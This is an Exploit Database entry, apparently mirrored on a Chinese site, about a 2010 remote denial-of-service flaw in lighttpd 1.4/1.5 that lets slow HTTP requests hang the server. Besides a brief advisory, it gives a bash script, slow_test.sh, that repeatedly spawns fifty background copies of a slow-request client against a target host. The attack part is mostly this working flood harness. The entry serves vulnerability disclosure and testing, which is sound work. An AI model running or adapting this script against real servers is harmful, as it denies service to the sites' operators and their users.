lighttpd 1.4/1.5 – Slow Request Handling Remote Denial of Service

• Exploit Database
• 46 阅读

• 作者： Li Ming
  日期： 2010-02-02
• 类别：

  • dos
  平台：

  • linux
• 来源：https://www.exploit-db.com/exploits/33591/

• source: https://www.securityfocus.com/bid/38036/info
  
  The 'lighttpd' webserver is prone to a denial-of-service vulnerability.
  
  Remote attackers can exploit this issue to cause the application to hang, denying service to legitimate users. 
  
  ##slow_test.sh
  for ((j=0;j<1000;j++)) do
  for ((i=0; i<50; i++)) do
  ## slow_client is a C program which sends a HTTP request very slowly
  ./slow_client http://www.example.com/>/dev/null 2>/dev/null &
  done&
  sleep 3
  done